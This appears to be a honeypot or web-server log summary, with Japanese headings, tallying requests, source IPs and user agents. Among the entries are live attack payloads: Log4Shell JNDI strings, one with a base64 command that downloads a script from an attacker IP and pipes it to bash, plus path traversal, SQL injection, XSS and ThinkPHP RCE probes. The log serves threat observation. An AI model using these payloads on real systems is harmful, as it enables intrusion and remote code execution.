1	GET	`/~phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`/~riba/pma/scripts/setup.php`	HTTP/1.1
1	HEAD	`/actuator/auditevents`	HTTP/1.1
1	HEAD	`/actuator/beans`	HTTP/1.1
1	HEAD	`/actuator/conditions`	HTTP/1.1
1	HEAD	`/actuator/configprops`	HTTP/1.1
1	HEAD	`/actuator/env`	HTTP/1.1
1	HEAD	`/actuator/health`	HTTP/1.1
1	HEAD	`/actuator/heapdump`	HTTP/1.1
1	HEAD	`/actuator/httptrace`	HTTP/1.1
1	HEAD	`/actuator/hystrix.stream`	HTTP/1.1
1	HEAD	`/actuator/info`	HTTP/1.1
1	HEAD	`/actuator/jolokia`	HTTP/1.1
1	HEAD	`/actuator/loggers`	HTTP/1.1
1	HEAD	`/actuator/mappings`	HTTP/1.1
1	HEAD	`/actuator/metrics`	HTTP/1.1
1	HEAD	`/actuator/scheduledtasks`	HTTP/1.1
1	HEAD	`/actuator/threaddump`	HTTP/1.1
1	HEAD	`/actuator`	HTTP/1.1
1	HEAD	`/auditevents`	HTTP/1.1
1	HEAD	`/autoconfig`	HTTP/1.1
1	HEAD	`/beans`	HTTP/1.1
1	HEAD	`/cloudfoundryapplication`	HTTP/1.1
1	HEAD	`/configprops`	HTTP/1.1
1	HEAD	`/dump`	HTTP/1.1
1	HEAD	`/env`	HTTP/1.1
1	HEAD	`/health`	HTTP/1.1
1	HEAD	`/heapdump`	HTTP/1.1
1	HEAD	`/hystrix.stream`	HTTP/1.1
1	HEAD	`/info`	HTTP/1.1
1	HEAD	`/jolokia`	HTTP/1.1
1	HEAD	`/loggers`	HTTP/1.1
1	HEAD	`/mappings`	HTTP/1.1
1	HEAD	`/metrics`	HTTP/1.1
1	HEAD	`/threaddump`	HTTP/1.1
1	HEAD	`/trace`	HTTP/1.1
11	OPTIONS	`/`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
4	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
3	PROPFIND	`/`	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	20.55.53.144	United States
4	43.228.125.213	Hong Kong
22	45.67.221.63	Germany
1	68.183.203.184	United States
1	69.194.182.218	United States
2	94.232.43.63	Russia
1	103.28.70.140	United States
1	107.189.1.121	United States
90	111.13.127.129	China
5	115.144.69.135	South Korea
1	125.42.122.230	China
1	135.125.217.54	France
1	139.59.69.61	Singapore
1	139.162.145.250	Netherlands
1	143.110.227.92	United States
2	144.126.209.23	United States
1	147.182.224.211	United States
1	147.182.232.128	United States
1	164.52.53.163	China
1	165.232.137.148	United States
1	185.10.68.168	Seychelles
1	185.83.214.69	Portugal
4	185.142.236.43	Seychelles
1	192.3.136.21	United States
1	192.241.211.249	United States
12	195.54.160.149	Russia
1	198.98.49.124	United States
1	205.185.120.201	United States
1	206.189.21.147	United States
1	207.148.31.82	United States
1	209.17.97.58	United States
1	209.141.35.110	United States
3	209.141.50.223	United States

UserAgent一覧

件数	UserAgent
2	`${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}`
1	`${jndi:ldap://45[.]83[.]193[.]150:1389/Exploit}`
13	`-`
1	`Hello, World`
1	`Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)`
7	`Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http[:]//www[.]google[.]com/mobile/adsbot.html)`
9	`Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)`
1	`Mozilla/5.0 (Linux; Android 7.0; BLL-L23) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3599.0 Safari/537.36`
10	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3599.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3599.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3599.0 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3599.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3599.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.18247`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko`
5	`Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
2	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F`
12	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
9	`Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html)`
6	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
4	`Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http[:]//www[.]google[.]com/mobile/adsbot.html)`
3	`Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html) Safari/537.36`
1	`Mozilla/5.0 zgrab/0.x`
1	`asusrouter--`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
2		`\x03`
1		`\x16\x03\x01\x01\xfb\x01`
3		`\x16\x03\x01\x02`
3		`\x16\x03\x01`
1	GET	`/.drone.yml`	HTTP/1.1
12	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
2	GET	`/?x=${jndi:ldap://195[.]54[.]160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy42Ny40NC4yMzQ6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuNjcuNDQuMjM0OjgwKXxiYXNo}`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/__clockwork/app`	HTTP/1.1
2	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/api/experimental/latest_runs`	HTTP/1.1
1	GET	`/appGet.cgi?hook=get_cfg_clientlist()`	HTTP/1.1
4	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError`	HTTP/1.1
1	GET	`/cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E`	HTTP/1.1
1	GET	`/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C`	HTTP/1.1
2	GET	`/evox/about`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.asp`	HTTP/1.1
1	GET	`/index.php/catalogsearch/advanced/result/?name=e`	HTTP/1.1
1	GET	`/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/login`	HTTP/1.1
1	GET	`/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-`	HTTP/1.1
1	GET	`/nmaplowercheck1639568374`	HTTP/1.1
1	GET	`/nmaplowercheck1639590291`	HTTP/1.1
1	GET	`/qvisdvr/`	HTTP/1.1
1	GET	`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/wp-content/uploads/2021/12/xem-phim-Phong-Khoi-Lac-Duong-Luoyang-2021--300x450.jpg`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
90	HEAD	`http[:]//81[.]71[.]160[.]63/cc.php`	HTTP/1.1
1	POST	`/${jndi:ldap://45[.]83[.]193[.]150:1389/Exploit}`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/artifactory/ui/auth/login?_spring_security_remember_me=false`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/getcfg.php`	HTTP/1.1
1	POST	`/ispirit/interface/gateway.php`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
2	POST	`/sys/ui/extend/varkind/custom.jsp`	HTTP/1.1
1	POST	`/upload/UploadResourcePic.ashx?ResourceID=8382`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	POST	`/wp-admin/admin-ajax.php`	HTTP/1.1